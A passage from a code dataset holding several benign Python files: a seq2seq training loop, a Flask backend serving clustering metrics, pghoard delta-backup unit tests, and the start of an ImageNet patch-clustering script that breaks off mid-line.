optimiser.zero_grad()\n # input_idx: the ID matrix for the input tokens in a batch;\n # output_idx: the ID matrix for the output tokens in a batch;\n input_seq, out_seq_list, _, out_idx = net.pack_batch(batch, net.emb, device)\n # net.encode calls nn.LSTM by which the forward function is called to run the neural network.\n # enc is a batch of last time step's hidden state outputted by encoder.\n # enc = net.encode(input_seq)\n context, enc = net.encode_context(input_seq)\n\n net_results = []\n net_targets = []\n for idx, out_seq in enumerate(out_seq_list):\n ref_indices = out_idx[idx][1:]\n # 
Get the last step's hidden state and cell state of encoder for the idx-th element in a batch.\n enc_item = net.get_encoded_item(enc, idx)\n # Using teacher forcing to train the model.\n if random.random() < TEACHER_PROB:\n context_temp = context[idx]\n r = net.decode_teacher(enc_item, out_seq, context[idx])\n blue_temp = net.seq_bleu(r, ref_indices)\n bleu_sum += blue_temp\n # Get predicted tokens.\n seq = torch.max(r.data, dim=1)[1]\n seq = seq.cpu().numpy()\n # Train by using the argmax;\n else:\n r, seq = net.decode_chain_argmax(enc_item, out_seq.data[0:1],\n len(ref_indices), context[idx])\n blue_temp = utils.calc_bleu(seq, ref_indices)\n bleu_sum += blue_temp\n net_results.append(r)\n net_targets.extend(ref_indices)\n bleu_count += 1\n\n if not dial_shown:\n # data.decode_words transform IDs to tokens.\n ref_words = [utils.untokenize(data.decode_words(ref_indices, rev_emb_dict))]\n log.info(\"Reference: %s\", \" ~~|~~ \".join(ref_words))\n log.info(\"Predicted: %s, bleu=%.4f\", utils.untokenize(data.decode_words(seq, rev_emb_dict)), blue_temp)\n dial_shown = True\n results_v = torch.cat(net_results)\n results_v = results_v.cuda()\n targets_v = torch.LongTensor(net_targets).to(device)\n targets_v = targets_v.cuda()\n loss_v = F.cross_entropy(results_v, targets_v)\n loss_v = loss_v.cuda()\n loss_v.backward()\n optimiser.step()\n\n losses.append(loss_v.item())\n bleu = bleu_sum / bleu_count\n bleu_test = run_test(test_data, net, end_token, device)\n log.info(\"Epoch %d: mean loss %.3f, mean BLEU %.3f, test BLEU %.3f\",\n epoch, np.mean(losses), bleu, bleu_test)\n writer.add_scalar(\"loss\", np.mean(losses), epoch)\n writer.add_scalar(\"bleu\", bleu, epoch)\n writer.add_scalar(\"bleu_test\", bleu_test, epoch)\n if best_bleu is None or best_bleu < bleu_test:\n if best_bleu is not None:\n out_name = os.path.join(saves_path, \"pre_bleu_%.3f_%02d.dat\" %\n (bleu_test, epoch))\n torch.save(net.state_dict(), out_name)\n log.info(\"Best BLEU updated %.3f\", bleu_test)\n best_bleu = bleu_test\n\n if epoch % 10 == 0:\n out_name = os.path.join(saves_path, \"epoch_%03d_%.3f_%.3f.dat\" %\n (epoch, bleu, bleu_test))\n torch.save(net.state_dict(), out_name)\n print (\"------------------Epoch \" + str(epoch) + \": training is over.------------------\")\n\n time_end = time.time()\n log.info(\"Training time is %.3fs.\" % (time_end - time_start))\n print(\"Training time is %.3fs.\" % (time_end - time_start))\n\n writer.close()","sub_path":"S2SRL/train_crossent.py","file_name":"train_crossent.py","file_ext":"py","file_size_in_byte":9636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"62899540","text":"from flask import Flask, jsonify\nfrom flask_cors import CORS\n\nimport os\nimport sys\nsys.path.append(os.path.abspath(\"./Clustering\"))\nfrom clusterEnsembles import clusterEnsembles\nfrom mdsUtils import MDSSimMatrixUtils\n\nruns = [\n\t\t\t\"./Clustering/Result/20News_Kmeans_Hashing.json\",\n \t\"./Clustering/Result/20News_Kmeans_TFIDF_Hashing.json\",\n \t\"./Clustering/Result/20News_Kmeans_TFIDF_LSA.json\",\n \t\"./Clustering/Result/20News_Kmeans_TFIDF.json\",\n\t \"./Clustering/Result/20News_Agglomerative_TFIDF.json\",\n\t \"./Clustering/Result/20News_Agglomerative_Hashing.json\",\n \t#\"./Clustering/Result/20News_Agglomerative_TFIDF_Hashing.json\",\n \t#\"./Clustering/Result/20News_Agglomerative_TFIDF_LSA.json\"\n\t\t]\n\nensembles = clusterEnsembles(runs)\n\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route(\"/\")\ndef hello():\n return \"Hello 
from Flask backend!\"\n\n\n@app.route(\"/barMatrix\")\ndef getBarMatrix():\n\tdic = ensembles.computeBarMatrix(dumpToFile = False)\n\treturn jsonify(dic)\n\n\n@app.route(\"/randomIndex\")\ndef getRandomIndex():\n\tdic = ensembles.computeRandIndex(dumpToFile = False)\n\treturn jsonify(dic)\n\n@app.route(\"/randomIndexMDS\")\ndef getRandomIndexMDS():\n\tdic = ensembles.computeRandIndex(dumpToFile = False)\n\treturn jsonify({'randomIndexMDS': MDSSimMatrixUtils(dic['randomIndex'])})\n\n\n@app.route(\"/adjustRandomIndex\")\ndef getAdjustRandomIndex():\n\tdic = ensembles.computeRandIndex(adjust = True, dumpToFile = False)\n\treturn jsonify(dic)\n\n@app.route(\"/adjustRandomIndexMDS\")\ndef getAdjustRandomIndexMDS():\n\tdic = ensembles.computeRandIndex(adjust = True, dumpToFile = False)\n\treturn jsonify({'adjustRandomIndexMDS':MDSSimMatrixUtils(dic['adjustRandomIndex'])})\n\n\n@app.route(\"/mutualInformation\")\ndef getMutualInfo():\n\tdic = ensembles.computeMutualInformation(dumpToFile = False)\n\treturn jsonify(dic)\n\n@app.route(\"/mutualInformationMDS\")\ndef getMutualInfoMDS():\n\tdic = ensembles.computeMutualInformation(dumpToFile = False)\n\treturn jsonify({'mutualInformationMDS':MDSSimMatrixUtils(dic['mutualInformation'])})\n\n\n@app.route(\"/normalizedMutualInformation\")\ndef getNormalizedMutualInfo():\n\tdic = ensembles.computeMutualInformation(NMI = True, dumpToFile = False)\n\treturn jsonify(dic)\n\n@app.route(\"/normalizedMutualInformationMDS\")\ndef getNormalizedMutualInfoMDS():\n\tdic = ensembles.computeMutualInformation(NMI = True, dumpToFile = False)\n\treturn jsonify({'normalizedMutualInformationMDS':MDSSimMatrixUtils(dic['normalizedMutualInformation'])})\n\n\n@app.route(\"/c2cMDS\")\ndef getc2cMDS():\n\tdic = ensembles.renderingc2cMDS\n\treturn jsonify(dic)\n\n\n@app.route(\"/variationOfInformation\")\ndef getVariationOfInfo():\n\tdic = ensembles.computeMutualInformation(VI = True, dumpToFile = False)\n\treturn jsonify(dic)\n\n@app.route(\"/variationOfInformationMDS\")\ndef getVariationOfInfoMDS():\n\tdic = ensembles.computeMutualInformation(VI = True, dumpToFile = False)\n\treturn jsonify({'variationOfInformationMDS':MDSSimMatrixUtils(dic['variationOfInformation'])})\n\n\n@app.route(\"/superObject\")\ndef getSuperObject():\n\tdic = ensembles.getSuperObject()\n\treturn jsonify(dic)\n\n\n\nif __name__ == \"__main__\":\n app.run(host = '127.0.0.1', port=9000)","sub_path":"Flask_Backend/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"573731785","text":"# Copyright (c) 2022 Aiven, Helsinki, Finland. 
https://aiven.io/\nimport random\nimport string\nfrom pathlib import Path\nfrom queue import Empty\nfrom test.base import CONSTANT_TEST_RSA_PUBLIC_KEY\nfrom typing import Any, Callable, Dict, Generator, Tuple\nfrom unittest.mock import MagicMock, Mock\n\nimport mock\nimport pytest\nfrom mock import patch\nfrom rohmu.delta.common import SnapshotFile, SnapshotResult, SnapshotState\nfrom rohmu.delta.snapshot import Snapshotter\nfrom rohmu.errors import FileNotFoundFromStorageError\n\nfrom pghoard.basebackup.chunks import ChunkUploader, HashFile\nfrom pghoard.basebackup.delta import DeltaBaseBackup, UploadedFilesMetric\nfrom pghoard.common import (BackupFailure, BaseBackupFormat, CallbackEvent, CallbackQueue, CompressionData, EncryptionData)\nfrom pghoard.metrics import Metrics\nfrom pghoard.transfer import TransferQueue\n\n\n@pytest.fixture(name=\"delta_paths\")\ndef fixture_delta_paths(tmp_path: Path) -> Generator[Tuple[Path, Path], None, None]:\n src = tmp_path / \"src\"\n dst = tmp_path / \"dst\"\n src.mkdir()\n dst.mkdir()\n yield src, dst\n\n\n@pytest.fixture(name=\"snapshotter\")\ndef fixture_snapshotter(delta_paths: Tuple[Path, Path]) -> Snapshotter:\n src, dst = delta_paths\n return Snapshotter(globs=[\"**/*\"], src=src, dst=dst)\n\n\nDeltaFilesGeneratorType = Callable[[int], Generator[Tuple[Path, str], None, None]]\n\n\n@pytest.fixture(name=\"delta_files_generator\")\ndef fixture_delta_files_generator(delta_paths: Tuple[Path, Path]) -> DeltaFilesGeneratorType:\n def delta_files(n: int):\n src, _ = delta_paths\n for i in range(n):\n file_name = Path(f\"test_{i}.dat\")\n\n with open(src / file_name, \"w\") as f:\n for _ in range(4):\n f.write(random.choice(string.ascii_letters) * 50)\n\n with HashFile(path=src / file_name) as hash_file:\n hash_file.read()\n file_hash = hash_file.hash.hexdigest()\n\n yield file_name, file_hash\n\n return delta_files\n\n\n@pytest.fixture(name=\"delta_file\")\ndef fixture_delta_file(delta_files_generator: DeltaFilesGeneratorType) -> Tuple[Path, str]:\n return next(delta_files_generator(1))\n\n\n@pytest.fixture(name=\"deltabasebackup\")\ndef fixture_deltabasebackup(tmp_path: Path) -> DeltaBaseBackup:\n transfer_queue: TransferQueue = TransferQueue()\n metrics = Metrics(statsd={})\n site_config = {\n \"prefix\": \"abc\",\n }\n encryption_data = EncryptionData(\"test_key\", CONSTANT_TEST_RSA_PUBLIC_KEY)\n compression_data = CompressionData(\"snappy\", 0)\n chunk_uploader = ChunkUploader(\n metrics=metrics,\n chunks_on_disk=0,\n encryption_data=encryption_data,\n compression_data=compression_data,\n site_config=site_config,\n site=\"delta\",\n is_running=lambda: True,\n transfer_queue=transfer_queue\n )\n storage = Mock()\n data_file_format = \"{}/{}.{{0:08d}}.pghoard\".format(tmp_path, \"test\").format\n delta_base_backup = DeltaBaseBackup(\n storage=storage,\n site=\"delta\",\n site_config=site_config,\n transfer_queue=transfer_queue,\n metrics=metrics,\n encryption_data=encryption_data,\n compression_data=compression_data,\n get_remote_basebackups_info=MagicMock(),\n parallel=1,\n temp_base_dir=tmp_path,\n compressed_base=tmp_path,\n chunk_uploader=chunk_uploader,\n data_file_format=data_file_format,\n )\n\n return delta_base_backup\n\n\ndef generate_backup_meta_sample(base_backup_format: BaseBackupFormat) -> Dict[str, Any]:\n meta: Dict[str, Any] = {\"manifest\": {\"snapshot_result\": {\"state\": {\"files\": []}}}}\n files = []\n if base_backup_format == BaseBackupFormat.delta_v1:\n files = [{\n \"relative_path\": \"base/1/1\",\n \"file_size\": 8192,\n 
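# (Editor's note, illustrative: in these fabricated manifests each file entry is
#  either stored by content hash, with "file_size" the original byte count and
#  "stored_file_size" the uploaded size, or embedded inline via "content_b64",
#  in which case "stored_file_size" is 0 and "hexdigest" is empty.)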
\"stored_file_size\": 100,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"delta1hex1\",\n \"content_b64\": None,\n }, {\n \"relative_path\": \"base/1/2\",\n \"file_size\": 8192,\n \"stored_file_size\": 200,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"delta1hex2\",\n \"content_b64\": None,\n }, {\n \"relative_path\": \"base/1/3\",\n \"file_size\": 1,\n \"stored_file_size\": 0,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"\",\n \"content_b64\": \"b64\",\n }]\n elif base_backup_format == BaseBackupFormat.delta_v2:\n files = [{\n \"relative_path\": \"base/1/3\",\n \"file_size\": 8192,\n \"stored_file_size\": 50,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"delta2hex1\",\n \"content_b64\": None,\n \"should_be_bundled\": False\n }, {\n \"relative_path\": \"base/1/4\",\n \"file_size\": 8192,\n \"stored_file_size\": 150,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"delta2hex2\",\n \"content_b64\": None,\n \"should_be_bundled\": False\n }, {\n \"relative_path\": \"base/1/4\",\n \"file_size\": 8192,\n \"stored_file_size\": 0,\n \"mtime_ns\": 1652175599798812244,\n \"hexdigest\": \"\",\n \"content_b64\": \"b64\",\n \"should_be_bundled\": False,\n }]\n\n meta[\"manifest\"][\"snapshot_result\"][\"state\"][\"files\"] = files\n return meta\n\n\ndef fake_download_backup_meta(basebackup_path: str, **kwargs): # pylint: disable=unused-argument\n meta = {}\n if basebackup_path == \"abc/basebackup/delta_v1\":\n meta = generate_backup_meta_sample(BaseBackupFormat.delta_v1)\n elif basebackup_path == \"abc/basebackup/delta_v2\":\n meta = generate_backup_meta_sample(BaseBackupFormat.delta_v2)\n\n return meta, b\"abc\"\n\n\ndef test_list_existing_files_skips_non_delta_formats(deltabasebackup: DeltaBaseBackup) -> None:\n with patch.object(deltabasebackup, \"get_remote_basebackups_info\") as mock_get_remote_basebackups_info, \\\n patch(\"pghoard.basebackup.delta.download_backup_meta_file\", new=fake_download_backup_meta):\n mock_get_remote_basebackups_info.return_value = [\n {\n \"metadata\": {\n \"format\": BaseBackupFormat.v1\n }\n },\n {\n \"metadata\": {\n \"format\": BaseBackupFormat.v2\n }\n },\n {\n \"metadata\": {\n \"format\": BaseBackupFormat.delta_v1\n },\n \"name\": \"delta_v1\"\n },\n {\n \"metadata\": {\n \"format\": BaseBackupFormat.delta_v2\n },\n \"name\": \"delta_v2\"\n },\n {\n \"metadata\": {\n \"format\": \"unknown\"\n }\n },\n ]\n assert deltabasebackup._list_existing_files() == { # pylint: disable=protected-access\n \"delta1hex1\": SnapshotFile(\n relative_path=Path(\"base/1/1\"),\n file_size=8192,\n stored_file_size=100,\n mtime_ns=1652175599798812244,\n hexdigest=\"delta1hex1\",\n content_b64=None\n ),\n \"delta1hex2\": SnapshotFile(\n relative_path=Path(\"base/1/2\"),\n file_size=8192,\n stored_file_size=200,\n mtime_ns=1652175599798812244,\n hexdigest=\"delta1hex2\",\n content_b64=None\n ),\n \"delta2hex1\": SnapshotFile(\n relative_path=Path(\"base/1/3\"),\n file_size=8192,\n stored_file_size=50,\n mtime_ns=1652175599798812244,\n hexdigest=\"delta2hex1\",\n content_b64=None\n ),\n \"delta2hex2\": SnapshotFile(\n relative_path=Path(\"base/1/4\"),\n file_size=8192,\n stored_file_size=150,\n mtime_ns=1652175599798812244,\n hexdigest=\"delta2hex2\",\n content_b64=None\n )\n }\n\n\n@pytest.mark.parametrize(\"chunk_size\", [0, 1, 2, 3])\ndef test_split_files_for_upload_bundled_files(chunk_size: int) -> None:\n bundled_file_1 = SnapshotFile(\n relative_path=Path(\"file1\"), file_size=1, stored_file_size=1, mtime_ns=0, should_be_bundled=True, 
missing_ok=False\n )\n bundled_file_2 = SnapshotFile(\n relative_path=Path(\"file2\"),\n file_size=1,\n stored_file_size=1,\n mtime_ns=0,\n should_be_bundled=True,\n missing_ok=True,\n )\n bundled_file_3 = SnapshotFile(\n relative_path=Path(\"file3\"),\n file_size=1,\n stored_file_size=1,\n mtime_ns=0,\n should_be_bundled=True,\n hexdigest=\"xyz\",\n missing_ok=True\n )\n files = [bundled_file_1, bundled_file_2, bundled_file_3]\n snapshot_result = SnapshotResult(\n state=SnapshotState(root_globs=[\"**/*\"], files=files, empty_dirs=[]),\n end=None,\n hashes=None,\n )\n delta_chunks, hexdigests = DeltaBaseBackup._split_files_for_upload( # pylint: disable=protected-access\n snapshot_result=snapshot_result, snapshot_dir=Path(\"/dir\"), chunk_size=chunk_size\n )\n assert not hexdigests\n chunk_file1 = (Path(\"file1\"), Path(\"/dir/file1\"), False)\n chunk_file2 = (Path(\"file2\"), Path(\"/dir/file2\"), True)\n chunk_file3 = (Path(\"file3\"), Path(\"/dir/file3\"), True)\n if chunk_size <= 1:\n assert delta_chunks == [{chunk_file1}, {chunk_file2}, {chunk_file3}]\n elif chunk_size == 2:\n assert delta_chunks == [{chunk_file1, chunk_file2}, {chunk_file3}]\n elif chunk_size == 3:\n assert delta_chunks == [{chunk_file1, chunk_file2, chunk_file3}]\n\n\ndef test_split_files_for_upload_mixed_files() -> None:\n hexdigest_file = SnapshotFile(relative_path=Path(\"file1\"), file_size=5, stored_file_size=1, mtime_ns=0, hexdigest=\"abc\")\n bundled_file_1 = SnapshotFile(\n relative_path=Path(\"file2\"), file_size=2, stored_file_size=1, mtime_ns=0, should_be_bundled=True\n )\n bundled_file_2 = SnapshotFile(\n relative_path=Path(\"file3\"), file_size=2, stored_file_size=1, mtime_ns=0, should_be_bundled=True, hexdigest=\"xyz\"\n )\n _ = SnapshotFile(relative_path=Path(\"file3\"), file_size=2, stored_file_size=1, mtime_ns=0, content_b64=\"b64==\")\n files = [hexdigest_file, bundled_file_1, bundled_file_2]\n snapshot_result = SnapshotResult(\n state=SnapshotState(root_globs=[\"**/*\"], files=files, empty_dirs=[]), end=None, hashes=None\n )\n delta_chunks, hexdigests = DeltaBaseBackup._split_files_for_upload( # pylint: disable=protected-access\n snapshot_result=snapshot_result, snapshot_dir=Path(\"/dir\"), chunk_size=1\n )\n assert hexdigests == {\"abc\"}\n chunk_file1 = (Path(\"file2\"), Path(\"/dir/file2\"), True)\n chunk_file2 = (Path(\"file3\"), Path(\"/dir/file3\"), True)\n assert delta_chunks == [{chunk_file1}, {chunk_file2}]\n\n\ndef test_split_files_for_upload_skips_hexdigests() -> None:\n hexdigest_file_1 = SnapshotFile(\n relative_path=Path(\"file1\"), file_size=5, stored_file_size=1, mtime_ns=0, hexdigest=\"abc\"\n )\n hexdigest_file_2 = SnapshotFile(\n relative_path=Path(\"file2\"), file_size=5, stored_file_size=1, mtime_ns=0, hexdigest=\"def\"\n )\n files = [hexdigest_file_1, hexdigest_file_2]\n snapshot_result = SnapshotResult(\n state=SnapshotState(root_globs=[\"**/*\"], files=files, empty_dirs=[]), end=None, hashes=None\n )\n delta_chunks, hexdigests = DeltaBaseBackup._split_files_for_upload( # pylint: disable=protected-access\n snapshot_result=snapshot_result, snapshot_dir=Path(\"/dir\"), chunk_size=1, skip_hexdigests={\"abc\"}\n )\n assert hexdigests == {\"def\"}\n assert not delta_chunks\n\n\ndef test_submit_files_in_thread_fails_when_file_disappears(\n deltabasebackup: DeltaBaseBackup, delta_paths: Tuple[Path, Path], delta_file: Tuple[Path, str], snapshotter: Snapshotter\n) -> None:\n _, dst = delta_paths\n file_name, file_hash = delta_file\n\n with patch.object(deltabasebackup, 
\"_delta_upload_hexdigest\"):\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n (dst / file_name).unlink()\n assert not deltabasebackup._submit_files_in_thread( # pylint: disable=protected-access\n snapshotter=snapshotter, callback_queue=CallbackQueue(), new_hashes={}, hexdigest=file_hash\n )\n\n\ndef test_submit_files_in_thread_skip_upload(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_file: Tuple[Path, str]\n) -> None:\n _, file_hash = delta_file\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest:\n mock_delta_upload_hexdigest.return_value = (200, 10, file_hash, True)\n new_hashes: Dict[str, Tuple[int, int]] = {}\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n assert deltabasebackup._submit_files_in_thread( # pylint: disable=protected-access\n snapshotter=snapshotter, callback_queue=CallbackQueue(), new_hashes=new_hashes, hexdigest=file_hash\n )\n assert file_hash in new_hashes\n\n\ndef test_submit_files_in_thread_exception_silenced(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_file: Tuple[Path, str]\n) -> None:\n _, file_hash = delta_file\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest:\n mock_delta_upload_hexdigest.side_effect = Exception\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n assert not deltabasebackup._submit_files_in_thread( # pylint: disable=protected-access\n snapshotter=snapshotter, callback_queue=CallbackQueue(), new_hashes={}, hexdigest=file_hash\n )\n\n\ndef test_submit_files_in_thread_normal_upload(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_file: Tuple[Path, str]\n) -> None:\n _, file_hash = delta_file\n\n callback_queue: CallbackQueue = CallbackQueue()\n new_hashes: Dict[str, Tuple[int, int]] = {}\n\n callback_queue.get = Mock() # type: ignore\n callback_queue.get.side_effect = [Empty, None]\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest:\n mock_delta_upload_hexdigest.side_effect = callback_queue.put(CallbackEvent(success=True)) # type: ignore\n mock_delta_upload_hexdigest.return_value = (200, 10, file_hash, False)\n\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n assert deltabasebackup._submit_files_in_thread( # pylint: disable=protected-access\n snapshotter=snapshotter, callback_queue=callback_queue, new_hashes=new_hashes, hexdigest=file_hash,\n queue_timeout=0.1\n )\n\n assert file_hash in new_hashes\n\n\n@pytest.mark.parametrize(\"skip_upload\", [True, False])\ndef test_delta_upload_hexdigest(skip_upload: bool, deltabasebackup: DeltaBaseBackup, tmp_path: Path) -> None:\n file_path = tmp_path / \"new_file.dat\"\n with open(file_path, \"bw\") as f:\n f.write(b\"some data\" * 100)\n\n chunk_path = tmp_path / \"chunks\"\n chunk_path.mkdir()\n\n if skip_upload:\n deltabasebackup.submitted_hashes = {\"5cc8204133a65382a9045c82ffe166fb561e9d3f7c34babf85ed960e6195ea09\"}\n\n with open(file_path, \"rb\") as f:\n assert deltabasebackup._delta_upload_hexdigest( # pylint: disable=protected-access\n temp_dir=tmp_path,\n chunk_path=chunk_path / \"some file\",\n file_obj=f,\n callback_queue=CallbackQueue(),\n relative_path=Path(\"does/not/matter\")\n ) == (900, 240, 
\"5cc8204133a65382a9045c82ffe166fb561e9d3f7c34babf85ed960e6195ea09\", skip_upload)\n\n\n@pytest.mark.parametrize(\"key_exists\", [True, False])\ndef test_upload_single_delta_files_cleanup_after_error(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_file: Tuple[Path, str], key_exists: bool\n) -> None:\n _, file_hash = delta_file\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest:\n mock_delta_upload_hexdigest.return_value = (200, 10, file_hash, True)\n snapshotter.update_snapshot_file_data = Mock(side_effect=Exception)\n\n if not key_exists:\n deltabasebackup.storage.delete_key.side_effect = FileNotFoundFromStorageError\n\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n with pytest.raises(BackupFailure):\n deltabasebackup._upload_single_delta_files(todo_hexdigests={file_hash}, snapshotter=snapshotter, progress=0) # pylint: disable=protected-access\n deltabasebackup.storage.delete_key.assert_called_with(f\"abc/basebackup_delta/{file_hash}\")\n\n\n@pytest.mark.parametrize(\"files_count, initial_progress\", [(1, 0), (4, 0), (10, 0), (1, 90), (15, 10)])\ndef test_upload_single_delta_files_progress(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_files_generator: DeltaFilesGeneratorType,\n files_count: int, initial_progress: float\n) -> None:\n delta_files = list(delta_files_generator(files_count))\n delta_hashes = {file_hash for _, file_hash in delta_files}\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest, \\\n patch.object(deltabasebackup, \"metrics\") as mock_metrics:\n mock_delta_upload_hexdigest.side_effect = [(200, 10, file_hash, True) for file_hash in delta_hashes]\n snapshotter.update_snapshot_file_data = Mock()\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n deltabasebackup._upload_single_delta_files( # pylint: disable=protected-access\n todo_hexdigests=delta_hashes, snapshotter=snapshotter, progress=initial_progress\n )\n expected_calls = [\n mock.call(\n \"pghoard.basebackup_estimated_progress\",\n initial_progress + (idx + 1) * (100 - initial_progress) / files_count,\n tags={\"site\": \"delta\"}\n ) for idx in range(files_count)\n ]\n assert mock_metrics.gauge.mock_calls == expected_calls\n\n\ndef test_upload_single_delta_files(\n deltabasebackup: DeltaBaseBackup, snapshotter: Snapshotter, delta_file: Tuple[Path, str]\n) -> None:\n _, file_hash = delta_file\n\n with patch.object(deltabasebackup, \"_delta_upload_hexdigest\") as mock_delta_upload_hexdigest:\n mock_delta_upload_hexdigest.return_value = (200, 10, file_hash, True)\n with snapshotter.lock:\n deltabasebackup._snapshot(snapshotter=snapshotter) # pylint: disable=protected-access\n metric = deltabasebackup._upload_single_delta_files( # pylint: disable=protected-access\n todo_hexdigests={file_hash}, snapshotter=snapshotter, progress=0\n )\n assert metric == UploadedFilesMetric(input_size=200, stored_size=10, count=1)\n\n\ndef test_read_delta_sizes(deltabasebackup: DeltaBaseBackup):\n files = [\n SnapshotFile(relative_path=Path(\"f1\"), file_size=100, stored_file_size=20, mtime_ns=0, should_be_bundled=True),\n SnapshotFile(\n relative_path=Path(\"f2\"), file_size=100, stored_file_size=20, mtime_ns=0, should_be_bundled=False, hexdigest=\"a\"\n ),\n SnapshotFile(\n relative_path=Path(\"f3\"), file_size=200, stored_file_size=40, mtime_ns=0, should_be_bundled=False, 
hexdigest=\"b\"\n ),\n SnapshotFile(\n relative_path=Path(\"f4\"),\n file_size=5,\n stored_file_size=5,\n mtime_ns=0,\n should_be_bundled=False,\n hexdigest=\"\",\n content_b64=\"b64\"\n )\n ]\n snapshot_result = SnapshotResult(\n state=SnapshotState(root_globs=[\"**/*\"], files=files, empty_dirs=[]), end=None, hashes=None\n )\n digest_metric, embed_metric = deltabasebackup._read_delta_sizes(snapshot_result=snapshot_result) # pylint: disable=protected-access\n assert digest_metric == UploadedFilesMetric(input_size=300, stored_size=60, count=2)\n assert embed_metric == UploadedFilesMetric(input_size=5, stored_size=5, count=1)\n\n # Add one more file which should not be uploaded as it was already uploaded previously, so the stored_file_size\n # should be restored from already tracked files\n files.append(\n SnapshotFile(\n relative_path=Path(\"f5\"), file_size=300, stored_file_size=0, mtime_ns=0, should_be_bundled=False, hexdigest=\"c\"\n )\n )\n snapshot_result = SnapshotResult(\n state=SnapshotState(root_globs=[\"**/*\"], files=files, empty_dirs=[]), end=None, hashes=None\n )\n deltabasebackup.tracked_snapshot_files = {\n \"c\": SnapshotFile(\n relative_path=Path(\"f5\"), file_size=300, stored_file_size=60, mtime_ns=0, should_be_bundled=False, hexdigest=\"c\"\n )\n }\n digest_metric, embed_metric = deltabasebackup._read_delta_sizes(snapshot_result=snapshot_result) # pylint: disable=protected-access\n assert digest_metric == UploadedFilesMetric(input_size=600, stored_size=120, count=3)\n assert embed_metric == UploadedFilesMetric(input_size=5, stored_size=5, count=1)\n","sub_path":"test/basebackup/test_delta.py","file_name":"test_delta.py","file_ext":"py","file_size_in_byte":21682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"208837194","text":"\"\"\"\nThis module extracts conv chunks from an image file. Unlike many others such as imagell.py cluster.py and knnimage.py\nit does not use MapFn but rather extracts and moves slices\n\nIt then creates a clustering from that database and tests the cluster by finding accuracy for labeling test files\nwith direct access to the database and then again against only the subset of the database brought in by the clusters\n\nNote the K means implemented here is spherical k means\n\nAt time of writing the testing itself was not implemented yet. You'll see a TBD below if still true\n\n\"\"\"\nfrom __future__ import print_function\n# import csv\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport random\nimport urllib2\nfrom matplotlib import pyplot as plt\nfrom tensorflow.python import debug as tf_debug\n\n\nfdir = (\"/devlink2/data/imagenet/\")\nimg_w = 32 # 12\nimg_h = 32 # 8\nc_num_convs = img_h*img_w\nc_num_centroids = 300\nc_kernel_size = 3*3*3\nc_num_ks = 3 # 32\nc_class_dir_limit = 200\nc_min_file_size = 1000\nc_num_files_per_batch = 1000 # 2000\n# how much to offset the reciprocal for vote counting. 
So that the first is 1/c_knn_offset, second 1/(c_knn_offset+1) etc.\n# the higher the value the less rank actually matters\nc_knn_offset = 5.0\nc_num_classes = 10\ncb_limit_classes = True\n\n\nt_data = tf.Variable(tf.zeros([3, img_h+2, img_w+2], dtype=tf.float32), name='t_data')\n\n# image_string = urllib2.urlopen(url).read()\nclassnames = []\nfor ifn, fn in enumerate(os.listdir(fdir)):\n\tffn = os.path.join(fdir, fn)\n\tif os.path.isdir(ffn):\n\t\tclassnames.append(fn)\n\nall_file_list = []\nnum_files_in_class = []\nfor classname in classnames:\n\tfile_list = []\n\tdir_name = os.path.join(fdir, classname)\n\tfor ifn, fn in enumerate(os.listdir(dir_name)):\n\t\tif ifn >= c_class_dir_limit:\n\t\t\tbreak\n\t\tffn = os.path.join(dir_name, fn)\n\t\tif not os.path.isfile(ffn) or os.path.getsize(ffn) < c_min_file_size:\n\t\t\tcontinue\n\t\tfile_list.append(fn)\n\tall_file_list.append(file_list)\n\t# count only the files actually kept, so random indexing into file_list stays in range\n\tnum_files_in_class.append(len(file_list))\n\nnum_classes = len(classnames)\nif cb_limit_classes:\n\tnum_classes = min(num_classes, c_num_classes)\n\ndef get_file_strings(num):\n\tstrings = []\n\tclasses = []\n\tfor inum in range(num):\n\t\ticlass = random.randint(0, num_classes-1)\n\t\tifile = random.randint(0, num_files_in_class[iclass] - 1)\n\t\tffn = os.path.join(fdir, classnames[iclass], all_file_list[iclass][ifile])\n\t\twith open(ffn, mode='rb') as f:\n\t\t\tstrings.append(f.read())\n\t\tclasses.append(iclass)\n\treturn strings, classes\n\n# Decode string into matrix with intensity values\nph_image_string = tf.placeholder(dtype=tf.string, shape=(), name='ph_image_string')\nimage = tf.image.decode_jpeg(ph_image_string, channels=3)\nimage = tf.expand_dims(image, 0)\nimage = tf.image.resize_bilinear(image, [img_h+2, img_w+2])[0]\nop_data_set = tf.assign(t_data, tf.transpose(image, 